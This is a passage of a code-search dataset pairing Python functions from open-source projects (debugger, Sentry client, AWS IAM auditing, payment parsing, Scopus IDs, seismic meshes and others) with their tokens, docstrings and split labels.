[ "def", "set_suspend", "(", "self", ",", "thread", ",", "stop_reason", ",", "suspend_other_threads", "=", "False", ",", "is_pause", "=", "False", ")", ":", "self", ".", "_threads_suspended_single_notification", ".", "increment_suspend_time", "(", ")", "if", "is_pause", ":", "self", ".", "_threads_suspended_single_notification", ".", "on_pause", "(", ")", "info", "=", "self", ".", "_mark_suspend", "(", "thread", ",", "stop_reason", ")", "if", "is_pause", ":", "# Must set tracing after setting the state to suspend.", "frame", "=", "info", ".", "get_topmost_frame", "(", "thread", ")", "if", "frame", "is", "not", "None", ":", "try", ":", "self", ".", "set_trace_for_frame_and_parents", "(", "frame", ")", "finally", ":", "frame", "=", "None", "# If conditional breakpoint raises any exception during evaluation send the details to the client.", "if", "stop_reason", "==", "CMD_SET_BREAK", "and", "info", ".", "conditional_breakpoint_exception", "is", "not", "None", ":", "conditional_breakpoint_exception_tuple", "=", "info", ".", "conditional_breakpoint_exception", "info", ".", "conditional_breakpoint_exception", "=", "None", "self", ".", "_send_breakpoint_condition_exception", "(", "thread", ",", "conditional_breakpoint_exception_tuple", ")", "if", "not", "suspend_other_threads", "and", "self", ".", "multi_threads_single_notification", ":", "# In the mode which gives a single notification when all threads are", "# stopped, stop all threads whenever a set_suspend is issued.", "suspend_other_threads", "=", "True", "if", "suspend_other_threads", ":", "# Suspend all other threads.", "all_threads", "=", "pydevd_utils", ".", "get_non_pydevd_threads", "(", ")", "for", "t", "in", "all_threads", ":", "if", "getattr", "(", "t", ",", "'pydev_do_not_trace'", ",", "None", ")", ":", "pass", "# skip some other threads, i.e. ipython history saving thread from debug console", "else", ":", "if", "t", "is", "thread", ":", "continue", "info", "=", "self", ".", "_mark_suspend", "(", "t", ",", "CMD_THREAD_SUSPEND", ")", "frame", "=", "info", ".", "get_topmost_frame", "(", "t", ")", "# Reset the time as in this case this was not the main thread suspended.", "if", "frame", "is", "not", "None", ":", "try", ":", "self", ".", "set_trace_for_frame_and_parents", "(", "frame", ")", "finally", ":", "frame", "=", "None" ]
:param thread: The thread which should be suspended. :param stop_reason: Reason why the thread was suspended. :param suspend_other_threads: Whether to force other threads to be suspended (i.e.: when hitting a breakpoint with a suspend all threads policy). :param is_pause: If this is a pause to suspend all threads, any thread can be considered as the 'main' thread paused.
[ ":", "param", "thread", ":", "The", "thread", "which", "should", "be", "suspended", "." ]
python
train
getsentry/raven-python
raven/contrib/django/client.py
https://github.com/getsentry/raven-python/blob/d891c20f0f930153f508e9d698d9de42e910face/raven/contrib/django/client.py#L104-L142
def install_sql_hook(): """If installed this causes Django's queries to be captured.""" try: from django.db.backends.utils import CursorWrapper except ImportError: from django.db.backends.util import CursorWrapper try: real_execute = CursorWrapper.execute real_executemany = CursorWrapper.executemany except AttributeError: # XXX(mitsuhiko): On some very old django versions (<1.6) this # trickery would have to look different but I can't be bothered. return def record_many_sql(vendor, alias, start, sql, param_list): duration = time.time() - start for params in param_list: record_sql(vendor, alias, start, duration, sql, params) def execute(self, sql, params=None): start = time.time() try: return real_execute(self, sql, params) finally: record_sql(self.db.vendor, getattr(self.db, 'alias', None), start, time.time() - start, sql, params) def executemany(self, sql, param_list): start = time.time() try: return real_executemany(self, sql, param_list) finally: record_many_sql(self.db.vendor, getattr(self.db, 'alias', None), start, sql, param_list) CursorWrapper.execute = execute CursorWrapper.executemany = executemany breadcrumbs.ignore_logger('django.db.backends')
[ "def", "install_sql_hook", "(", ")", ":", "try", ":", "from", "django", ".", "db", ".", "backends", ".", "utils", "import", "CursorWrapper", "except", "ImportError", ":", "from", "django", ".", "db", ".", "backends", ".", "util", "import", "CursorWrapper", "try", ":", "real_execute", "=", "CursorWrapper", ".", "execute", "real_executemany", "=", "CursorWrapper", ".", "executemany", "except", "AttributeError", ":", "# XXX(mitsuhiko): On some very old django versions (<1.6) this", "# trickery would have to look different but I can't be bothered.", "return", "def", "record_many_sql", "(", "vendor", ",", "alias", ",", "start", ",", "sql", ",", "param_list", ")", ":", "duration", "=", "time", ".", "time", "(", ")", "-", "start", "for", "params", "in", "param_list", ":", "record_sql", "(", "vendor", ",", "alias", ",", "start", ",", "duration", ",", "sql", ",", "params", ")", "def", "execute", "(", "self", ",", "sql", ",", "params", "=", "None", ")", ":", "start", "=", "time", ".", "time", "(", ")", "try", ":", "return", "real_execute", "(", "self", ",", "sql", ",", "params", ")", "finally", ":", "record_sql", "(", "self", ".", "db", ".", "vendor", ",", "getattr", "(", "self", ".", "db", ",", "'alias'", ",", "None", ")", ",", "start", ",", "time", ".", "time", "(", ")", "-", "start", ",", "sql", ",", "params", ")", "def", "executemany", "(", "self", ",", "sql", ",", "param_list", ")", ":", "start", "=", "time", ".", "time", "(", ")", "try", ":", "return", "real_executemany", "(", "self", ",", "sql", ",", "param_list", ")", "finally", ":", "record_many_sql", "(", "self", ".", "db", ".", "vendor", ",", "getattr", "(", "self", ".", "db", ",", "'alias'", ",", "None", ")", ",", "start", ",", "sql", ",", "param_list", ")", "CursorWrapper", ".", "execute", "=", "execute", "CursorWrapper", ".", "executemany", "=", "executemany", "breadcrumbs", ".", "ignore_logger", "(", "'django.db.backends'", ")" ]
If installed this causes Django's queries to be captured.
[ "If", "installed", "this", "causes", "Django", "s", "queries", "to", "be", "captured", "." ]
python
train
nccgroup/Scout2
AWSScout2/services/iam.py
https://github.com/nccgroup/Scout2/blob/5d86d46d7ed91a92000496189e9cfa6b98243937/AWSScout2/services/iam.py#L244-L270
def parse_users(self, user, params): """ Parse a single IAM user and fetch additional data """ if user['UserName'] in self.users: return api_client = params['api_client'] # Ensure consistent attribute names across resource types user['id'] = user.pop('UserId') user['name'] = user.pop('UserName') user['arn'] = user.pop('Arn') policies = self.__get_inline_policies(api_client, 'user', user['id'], user['name']) if len(policies): user['inline_policies'] = policies user['inline_policies_count'] = len(policies) user['groups'] = [] groups = handle_truncated_response(api_client.list_groups_for_user, {'UserName': user['name']}, ['Groups'])['Groups'] for group in groups: user['groups'].append(group['GroupName']) try: user['LoginProfile'] = api_client.get_login_profile(UserName = user['name'])['LoginProfile'] except Exception as e: pass user['AccessKeys'] = api_client.list_access_keys(UserName = user['name'])['AccessKeyMetadata'] user['MFADevices'] = api_client.list_mfa_devices(UserName = user['name'])['MFADevices'] # TODO: Users signing certss self.users[user['id']] = user
[ "def", "parse_users", "(", "self", ",", "user", ",", "params", ")", ":", "if", "user", "[", "'UserName'", "]", "in", "self", ".", "users", ":", "return", "api_client", "=", "params", "[", "'api_client'", "]", "# Ensure consistent attribute names across resource types", "user", "[", "'id'", "]", "=", "user", ".", "pop", "(", "'UserId'", ")", "user", "[", "'name'", "]", "=", "user", ".", "pop", "(", "'UserName'", ")", "user", "[", "'arn'", "]", "=", "user", ".", "pop", "(", "'Arn'", ")", "policies", "=", "self", ".", "__get_inline_policies", "(", "api_client", ",", "'user'", ",", "user", "[", "'id'", "]", ",", "user", "[", "'name'", "]", ")", "if", "len", "(", "policies", ")", ":", "user", "[", "'inline_policies'", "]", "=", "policies", "user", "[", "'inline_policies_count'", "]", "=", "len", "(", "policies", ")", "user", "[", "'groups'", "]", "=", "[", "]", "groups", "=", "handle_truncated_response", "(", "api_client", ".", "list_groups_for_user", ",", "{", "'UserName'", ":", "user", "[", "'name'", "]", "}", ",", "[", "'Groups'", "]", ")", "[", "'Groups'", "]", "for", "group", "in", "groups", ":", "user", "[", "'groups'", "]", ".", "append", "(", "group", "[", "'GroupName'", "]", ")", "try", ":", "user", "[", "'LoginProfile'", "]", "=", "api_client", ".", "get_login_profile", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'LoginProfile'", "]", "except", "Exception", "as", "e", ":", "pass", "user", "[", "'AccessKeys'", "]", "=", "api_client", ".", "list_access_keys", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'AccessKeyMetadata'", "]", "user", "[", "'MFADevices'", "]", "=", "api_client", ".", "list_mfa_devices", "(", "UserName", "=", "user", "[", "'name'", "]", ")", "[", "'MFADevices'", "]", "# TODO: Users signing certss", "self", ".", "users", "[", "user", "[", "'id'", "]", "]", "=", "user" ]
Parse a single IAM user and fetch additional data
[ "Parse", "a", "single", "IAM", "user", "and", "fetch", "additional", "data" ]
python
train
bkeating/python-payflowpro
payflowpro/client.py
https://github.com/bkeating/python-payflowpro/blob/e74fc85135f171caa28277196fdcf7c7481ff298/payflowpro/client.py#L133-L174
def _parse_parmlist(self, parmlist): """ Parses a PARMLIST string into a dictionary of name and value pairs. The parsing is complicated by the following: - parameter keynames may or may not include a length specification - delimiter characters (=, &) may appear inside parameter values, provided the parameter has an explicit length. For example, the following parmlist values are possible: A=B&C=D A[1]=B&C[1]=D A=B&C[1]=D A[3]=B&B&C[1]=D (Here, the value of A is "B&B") A[1]=B&C[3]=D=7 (Here, the value of C is "D=7") """ parmlist = "&" + parmlist name_re = re.compile(r'\&([A-Z0-9_]+)(\[\d+\])?=') results = {} offset = 0 match = name_re.search(parmlist, offset) while match: name, len_suffix = match.groups() offset = match.end() if len_suffix: val_len = int(len_suffix[1:-1]) else: next_match = name_re.search(parmlist, offset) if next_match: val_len = next_match.start() - match.end() else: # At end of parmlist val_len = len(parmlist) - match.end() value = parmlist[match.end() : match.end() + val_len] results[name.lower()] = value match = name_re.search(parmlist, offset) return results
[ "def", "_parse_parmlist", "(", "self", ",", "parmlist", ")", ":", "parmlist", "=", "\"&\"", "+", "parmlist", "name_re", "=", "re", ".", "compile", "(", "r'\\&([A-Z0-9_]+)(\\[\\d+\\])?='", ")", "results", "=", "{", "}", "offset", "=", "0", "match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "while", "match", ":", "name", ",", "len_suffix", "=", "match", ".", "groups", "(", ")", "offset", "=", "match", ".", "end", "(", ")", "if", "len_suffix", ":", "val_len", "=", "int", "(", "len_suffix", "[", "1", ":", "-", "1", "]", ")", "else", ":", "next_match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "if", "next_match", ":", "val_len", "=", "next_match", ".", "start", "(", ")", "-", "match", ".", "end", "(", ")", "else", ":", "# At end of parmlist", "val_len", "=", "len", "(", "parmlist", ")", "-", "match", ".", "end", "(", ")", "value", "=", "parmlist", "[", "match", ".", "end", "(", ")", ":", "match", ".", "end", "(", ")", "+", "val_len", "]", "results", "[", "name", ".", "lower", "(", ")", "]", "=", "value", "match", "=", "name_re", ".", "search", "(", "parmlist", ",", "offset", ")", "return", "results" ]
Parses a PARMLIST string into a dictionary of name and value pairs. The parsing is complicated by the following: - parameter keynames may or may not include a length specification - delimiter characters (=, &) may appear inside parameter values, provided the parameter has an explicit length. For example, the following parmlist values are possible: A=B&C=D A[1]=B&C[1]=D A=B&C[1]=D A[3]=B&B&C[1]=D (Here, the value of A is "B&B") A[1]=B&C[3]=D=7 (Here, the value of C is "D=7")
[ "Parses", "a", "PARMLIST", "string", "into", "a", "dictionary", "of", "name", "and", "value", "pairs", ".", "The", "parsing", "is", "complicated", "by", "the", "following", ":", "-", "parameter", "keynames", "may", "or", "may", "not", "include", "a", "length", "specification", "-", "delimiter", "characters", "(", "=", "&", ")", "may", "appear", "inside", "parameter", "values", "provided", "the", "parameter", "has", "an", "explicit", "length", ".", "For", "example", "the", "following", "parmlist", "values", "are", "possible", ":", "A", "=", "B&C", "=", "D", "A", "[", "1", "]", "=", "B&C", "[", "1", "]", "=", "D", "A", "=", "B&C", "[", "1", "]", "=", "D", "A", "[", "3", "]", "=", "B&B&C", "[", "1", "]", "=", "D", "(", "Here", "the", "value", "of", "A", "is", "B&B", ")", "A", "[", "1", "]", "=", "B&C", "[", "3", "]", "=", "D", "=", "7", "(", "Here", "the", "value", "of", "C", "is", "D", "=", "7", ")" ]
python
train
ChristianKuehnel/btlewrap
btlewrap/gatttool.py
https://github.com/ChristianKuehnel/btlewrap/blob/1b7aec934529dcf03f5ecdccd0b09c25c389974f/btlewrap/gatttool.py#L19-L27
def wrap_exception(func: Callable) -> Callable: """Wrap all IOErrors to BluetoothBackendException""" def _func_wrapper(*args, **kwargs): try: return func(*args, **kwargs) except IOError as exception: raise BluetoothBackendException() from exception return _func_wrapper
[ "def", "wrap_exception", "(", "func", ":", "Callable", ")", "->", "Callable", ":", "def", "_func_wrapper", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "try", ":", "return", "func", "(", "*", "args", ",", "*", "*", "kwargs", ")", "except", "IOError", "as", "exception", ":", "raise", "BluetoothBackendException", "(", ")", "from", "exception", "return", "_func_wrapper" ]
Wrap all IOErrors to BluetoothBackendException
[ "Wrap", "all", "IOErrors", "to", "BluetoothBackendException" ]
python
train
codelv/enaml-native
src/enamlnative/android/android_view.py
https://github.com/codelv/enaml-native/blob/c33986e9eda468c508806e0a3e73c771401e5718/src/enamlnative/android/android_view.py#L330-L359
def set_layout(self, layout): """ Sets the LayoutParams of this widget. Since the available properties that may be set for the layout params depends on the parent, actual creation of the params is delegated to the parent Parameters ---------- layout: Dict A dict of layout parameters the parent should used to layout this child. The widget defaults are updated with user passed values. """ # Update the layout with the widget defaults update = self.layout_params is not None params = self.default_layout.copy() params.update(layout) # Create the layout params parent = self.parent() if not isinstance(parent, AndroidView): # Root node parent = self update = True parent.apply_layout(self, params) if update: self.widget.setLayoutParams(self.layout_params)
[ "def", "set_layout", "(", "self", ",", "layout", ")", ":", "# Update the layout with the widget defaults", "update", "=", "self", ".", "layout_params", "is", "not", "None", "params", "=", "self", ".", "default_layout", ".", "copy", "(", ")", "params", ".", "update", "(", "layout", ")", "# Create the layout params", "parent", "=", "self", ".", "parent", "(", ")", "if", "not", "isinstance", "(", "parent", ",", "AndroidView", ")", ":", "# Root node", "parent", "=", "self", "update", "=", "True", "parent", ".", "apply_layout", "(", "self", ",", "params", ")", "if", "update", ":", "self", ".", "widget", ".", "setLayoutParams", "(", "self", ".", "layout_params", ")" ]
Sets the LayoutParams of this widget. Since the available properties that may be set for the layout params depends on the parent, actual creation of the params is delegated to the parent Parameters ---------- layout: Dict A dict of layout parameters the parent should used to layout this child. The widget defaults are updated with user passed values.
[ "Sets", "the", "LayoutParams", "of", "this", "widget", ".", "Since", "the", "available", "properties", "that", "may", "be", "set", "for", "the", "layout", "params", "depends", "on", "the", "parent", "actual", "creation", "of", "the", "params", "is", "delegated", "to", "the", "parent", "Parameters", "----------", "layout", ":", "Dict", "A", "dict", "of", "layout", "parameters", "the", "parent", "should", "used", "to", "layout", "this", "child", ".", "The", "widget", "defaults", "are", "updated", "with", "user", "passed", "values", "." ]
python
train
intel-analytics/BigDL
pyspark/bigdl/optim/optimizer.py
https://github.com/intel-analytics/BigDL/blob/e9c19788285986ab789a2e2998f9a85d7524779f/pyspark/bigdl/optim/optimizer.py#L1009-L1023
def set_validation(self, batch_size, X_val, Y_val, trigger, val_method=None): """ Configure validation settings. :param batch_size: validation batch size :param X_val: features of validation dataset :param Y_val: label of validation dataset :param trigger: validation interval :param val_method: the ValidationMethod to use,e.g. "Top1Accuracy", "Top5Accuracy", "Loss" """ if val_method is None: val_method = [Top1Accuracy()] callBigDlFunc(self.bigdl_type, "setValidation", self.value, batch_size, trigger, [JTensor.from_ndarray(X) for X in to_list(X_val)], JTensor.from_ndarray(Y_val), to_list(val_method))
[ "def", "set_validation", "(", "self", ",", "batch_size", ",", "X_val", ",", "Y_val", ",", "trigger", ",", "val_method", "=", "None", ")", ":", "if", "val_method", "is", "None", ":", "val_method", "=", "[", "Top1Accuracy", "(", ")", "]", "callBigDlFunc", "(", "self", ".", "bigdl_type", ",", "\"setValidation\"", ",", "self", ".", "value", ",", "batch_size", ",", "trigger", ",", "[", "JTensor", ".", "from_ndarray", "(", "X", ")", "for", "X", "in", "to_list", "(", "X_val", ")", "]", ",", "JTensor", ".", "from_ndarray", "(", "Y_val", ")", ",", "to_list", "(", "val_method", ")", ")" ]
Configure validation settings. :param batch_size: validation batch size :param X_val: features of validation dataset :param Y_val: label of validation dataset :param trigger: validation interval :param val_method: the ValidationMethod to use,e.g. "Top1Accuracy", "Top5Accuracy", "Loss"
[ "Configure", "validation", "settings", "." ]
python
test
aholkner/bacon
native/Vendor/FreeType/src/tools/glnames.py
https://github.com/aholkner/bacon/blob/edf3810dcb211942d392a8637945871399b0650d/native/Vendor/FreeType/src/tools/glnames.py#L5171-L5183
def filter_glyph_names( alist, filter ): """filter `alist' by taking _out_ all glyph names that are in `filter'""" count = 0 extras = [] for name in alist: try: filtered_index = filter.index( name ) except: extras.append( name ) return extras
[ "def", "filter_glyph_names", "(", "alist", ",", "filter", ")", ":", "count", "=", "0", "extras", "=", "[", "]", "for", "name", "in", "alist", ":", "try", ":", "filtered_index", "=", "filter", ".", "index", "(", "name", ")", "except", ":", "extras", ".", "append", "(", "name", ")", "return", "extras" ]
filter `alist' by taking _out_ all glyph names that are in `filter
[ "filter", "alist", "by", "taking", "_out_", "all", "glyph", "names", "that", "are", "in", "filter" ]
python
test
ZeitOnline/briefkasten
application/briefkasten/dropbox.py
https://github.com/ZeitOnline/briefkasten/blob/ce6b6eeb89196014fe21d68614c20059d02daa11/application/briefkasten/dropbox.py#L376-L382
def replies(self): """ returns a list of strings """ fs_reply_path = join(self.fs_replies_path, 'message_001.txt') if exists(fs_reply_path): return [load(open(fs_reply_path, 'r'))] else: return []
[ "def", "replies", "(", "self", ")", ":", "fs_reply_path", "=", "join", "(", "self", ".", "fs_replies_path", ",", "'message_001.txt'", ")", "if", "exists", "(", "fs_reply_path", ")", ":", "return", "[", "load", "(", "open", "(", "fs_reply_path", ",", "'r'", ")", ")", "]", "else", ":", "return", "[", "]" ]
returns a list of strings
[ "returns", "a", "list", "of", "strings" ]
python
valid
mixmastamyk/console
console/detection.py
https://github.com/mixmastamyk/console/blob/afe6c95d5a7b83d85376f450454e3769e4a5c3d0/console/detection.py#L336-L344
def is_a_tty(stream=sys.stdout): ''' Detect terminal or something else, such as output redirection. Returns: Boolean, None: is tty or None if not found. ''' result = stream.isatty() if hasattr(stream, 'isatty') else None log.debug(result) return result
[ "def", "is_a_tty", "(", "stream", "=", "sys", ".", "stdout", ")", ":", "result", "=", "stream", ".", "isatty", "(", ")", "if", "hasattr", "(", "stream", ",", "'isatty'", ")", "else", "None", "log", ".", "debug", "(", "result", ")", "return", "result" ]
Detect terminal or something else, such as output redirection. Returns: Boolean, None: is tty or None if not found.
[ "Detect", "terminal", "or", "something", "else", "such", "as", "output", "redirection", "." ]
python
train
IdentityPython/oidcendpoint
src/oidcendpoint/userinfo.py
https://github.com/IdentityPython/oidcendpoint/blob/6c1d729d51bfb6332816117fe476073df7a1d823/src/oidcendpoint/userinfo.py#L164-L188
def userinfo_in_id_token_claims(endpoint_context, session, def_itc=None): """ Collect user info claims that are to be placed in the id token. :param endpoint_context: Endpoint context :param session: Session information :param def_itc: Default ID Token claims :return: User information or None """ if def_itc: itc = def_itc else: itc = {} itc.update(id_token_claims(session)) if not itc: return None _claims = by_schema(endpoint_context.id_token_schema, **itc) if _claims: return collect_user_info(endpoint_context, session, _claims) else: return None
[ "def", "userinfo_in_id_token_claims", "(", "endpoint_context", ",", "session", ",", "def_itc", "=", "None", ")", ":", "if", "def_itc", ":", "itc", "=", "def_itc", "else", ":", "itc", "=", "{", "}", "itc", ".", "update", "(", "id_token_claims", "(", "session", ")", ")", "if", "not", "itc", ":", "return", "None", "_claims", "=", "by_schema", "(", "endpoint_context", ".", "id_token_schema", ",", "*", "*", "itc", ")", "if", "_claims", ":", "return", "collect_user_info", "(", "endpoint_context", ",", "session", ",", "_claims", ")", "else", ":", "return", "None" ]
Collect user info claims that are to be placed in the id token. :param endpoint_context: Endpoint context :param session: Session information :param def_itc: Default ID Token claims :return: User information or None
[ "Collect", "user", "info", "claims", "that", "are", "to", "be", "placed", "in", "the", "id", "token", "." ]
python
train
scopus-api/scopus
scopus/utils/get_content.py
https://github.com/scopus-api/scopus/blob/27ce02dd3095bfdab9d3e8475543d7c17767d1ab/scopus/utils/get_content.py#L12-L49
def detect_id_type(sid): """Method that tries to infer the type of abstract ID. Parameters ---------- sid : str The ID of an abstract on Scopus. Raises ------ ValueError If the ID type cannot be inferred. Notes ----- PII usually has 17 chars, but in Scopus there are valid cases with only 16 for old converted articles. Scopus ID contains only digits, but it can have leading zeros. If ID with leading zeros is treated as a number, SyntaxError can occur, or the ID will be rendered invalid and the type will be misinterpreted. """ sid = str(sid) if not sid.isnumeric(): if sid.startswith('2-s2.0-'): id_type = 'eid' elif '/' in sid: id_type = 'doi' elif 16 <= len(sid) <= 17: id_type = 'pii' elif sid.isnumeric(): if len(sid) < 10: id_type = 'pubmed_id' else: id_type = 'scopus_id' else: raise ValueError('ID type detection failed for \'{}\'.'.format(sid)) return id_type
[ "def", "detect_id_type", "(", "sid", ")", ":", "sid", "=", "str", "(", "sid", ")", "if", "not", "sid", ".", "isnumeric", "(", ")", ":", "if", "sid", ".", "startswith", "(", "'2-s2.0-'", ")", ":", "id_type", "=", "'eid'", "elif", "'/'", "in", "sid", ":", "id_type", "=", "'doi'", "elif", "16", "<=", "len", "(", "sid", ")", "<=", "17", ":", "id_type", "=", "'pii'", "elif", "sid", ".", "isnumeric", "(", ")", ":", "if", "len", "(", "sid", ")", "<", "10", ":", "id_type", "=", "'pubmed_id'", "else", ":", "id_type", "=", "'scopus_id'", "else", ":", "raise", "ValueError", "(", "'ID type detection failed for \\'{}\\'.'", ".", "format", "(", "sid", ")", ")", "return", "id_type" ]
Method that tries to infer the type of abstract ID. Parameters ---------- sid : str The ID of an abstract on Scopus. Raises ------ ValueError If the ID type cannot be inferred. Notes ----- PII usually has 17 chars, but in Scopus there are valid cases with only 16 for old converted articles. Scopus ID contains only digits, but it can have leading zeros. If ID with leading zeros is treated as a number, SyntaxError can occur, or the ID will be rendered invalid and the type will be misinterpreted.
[ "Method", "that", "tries", "to", "infer", "the", "type", "of", "abstract", "ID", "." ]
python
train
JelleAalbers/multihist
multihist.py
https://github.com/JelleAalbers/multihist/blob/072288277f807e7e388fdf424c3921c80576f3ab/multihist.py#L167-L171
def density(self): """Gives emprical PDF, like np.histogram(...., density=True)""" h = self.histogram.astype(np.float) bindifs = np.array(np.diff(self.bin_edges), float) return h / (bindifs * self.n)
[ "def", "density", "(", "self", ")", ":", "h", "=", "self", ".", "histogram", ".", "astype", "(", "np", ".", "float", ")", "bindifs", "=", "np", ".", "array", "(", "np", ".", "diff", "(", "self", ".", "bin_edges", ")", ",", "float", ")", "return", "h", "/", "(", "bindifs", "*", "self", ".", "n", ")" ]
Gives emprical PDF, like np.histogram(...., density=True)
[ "Gives", "emprical", "PDF", "like", "np", ".", "histogram", "(", "....", "density", "=", "True", ")" ]
python
train
gem/oq-engine
openquake/hazardlib/geo/surface/base.py
https://github.com/gem/oq-engine/blob/8294553a0b8aba33fd96437a35065d03547d0040/openquake/hazardlib/geo/surface/base.py#L342-L375
def get_resampled_top_edge(self, angle_var=0.1): """ This methods computes a simplified representation of a fault top edge by removing the points that are not describing a change of direction, provided a certain tolerance angle. :param float angle_var: Number representing the maximum deviation (in degrees) admitted without the creation of a new segment :returns: A :class:`~openquake.hazardlib.geo.line.Line` representing the rupture surface's top edge. """ mesh = self.mesh top_edge = [Point(mesh.lons[0][0], mesh.lats[0][0], mesh.depths[0][0])] for i in range(len(mesh.triangulate()[1][0]) - 1): v1 = numpy.asarray(mesh.triangulate()[1][0][i]) v2 = numpy.asarray(mesh.triangulate()[1][0][i + 1]) cosang = numpy.dot(v1, v2) sinang = numpy.linalg.norm(numpy.cross(v1, v2)) angle = math.degrees(numpy.arctan2(sinang, cosang)) if abs(angle) > angle_var: top_edge.append(Point(mesh.lons[0][i + 1], mesh.lats[0][i + 1], mesh.depths[0][i + 1])) top_edge.append(Point(mesh.lons[0][-1], mesh.lats[0][-1], mesh.depths[0][-1])) line_top_edge = Line(top_edge) return line_top_edge
[ "def", "get_resampled_top_edge", "(", "self", ",", "angle_var", "=", "0.1", ")", ":", "mesh", "=", "self", ".", "mesh", "top_edge", "=", "[", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "0", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "0", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "0", "]", ")", "]", "for", "i", "in", "range", "(", "len", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", ")", "-", "1", ")", ":", "v1", "=", "numpy", ".", "asarray", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", "[", "i", "]", ")", "v2", "=", "numpy", ".", "asarray", "(", "mesh", ".", "triangulate", "(", ")", "[", "1", "]", "[", "0", "]", "[", "i", "+", "1", "]", ")", "cosang", "=", "numpy", ".", "dot", "(", "v1", ",", "v2", ")", "sinang", "=", "numpy", ".", "linalg", ".", "norm", "(", "numpy", ".", "cross", "(", "v1", ",", "v2", ")", ")", "angle", "=", "math", ".", "degrees", "(", "numpy", ".", "arctan2", "(", "sinang", ",", "cosang", ")", ")", "if", "abs", "(", "angle", ")", ">", "angle_var", ":", "top_edge", ".", "append", "(", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "i", "+", "1", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "i", "+", "1", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "i", "+", "1", "]", ")", ")", "top_edge", ".", "append", "(", "Point", "(", "mesh", ".", "lons", "[", "0", "]", "[", "-", "1", "]", ",", "mesh", ".", "lats", "[", "0", "]", "[", "-", "1", "]", ",", "mesh", ".", "depths", "[", "0", "]", "[", "-", "1", "]", ")", ")", "line_top_edge", "=", "Line", "(", "top_edge", ")", "return", "line_top_edge" ]
This methods computes a simplified representation of a fault top edge by removing the points that are not describing a change of direction, provided a certain tolerance angle. :param float angle_var: Number representing the maximum deviation (in degrees) admitted without the creation of a new segment :returns: A :class:`~openquake.hazardlib.geo.line.Line` representing the rupture surface's top edge.
[ "This", "methods", "computes", "a", "simplified", "representation", "of", "a", "fault", "top", "edge", "by", "removing", "the", "points", "that", "are", "not", "describing", "a", "change", "of", "direction", "provided", "a", "certain", "tolerance", "angle", "." ]
python
train
nvbn/thefuck
thefuck/specific/sudo.py
https://github.com/nvbn/thefuck/blob/40ab4eb62db57627bff10cf029d29c94704086a2/thefuck/specific/sudo.py#L6-L18
def sudo_support(fn, command): """Removes sudo before calling fn and adds it after.""" if not command.script.startswith('sudo '): return fn(command) result = fn(command.update(script=command.script[5:])) if result and isinstance(result, six.string_types): return u'sudo {}'.format(result) elif isinstance(result, list): return [u'sudo {}'.format(x) for x in result] else: return result
[ "def", "sudo_support", "(", "fn", ",", "command", ")", ":", "if", "not", "command", ".", "script", ".", "startswith", "(", "'sudo '", ")", ":", "return", "fn", "(", "command", ")", "result", "=", "fn", "(", "command", ".", "update", "(", "script", "=", "command", ".", "script", "[", "5", ":", "]", ")", ")", "if", "result", "and", "isinstance", "(", "result", ",", "six", ".", "string_types", ")", ":", "return", "u'sudo {}'", ".", "format", "(", "result", ")", "elif", "isinstance", "(", "result", ",", "list", ")", ":", "return", "[", "u'sudo {}'", ".", "format", "(", "x", ")", "for", "x", "in", "result", "]", "else", ":", "return", "result" ]
Removes sudo before calling fn and adds it after.
[ "Removes", "sudo", "before", "calling", "fn", "and", "adds", "it", "after", "." ]
python
train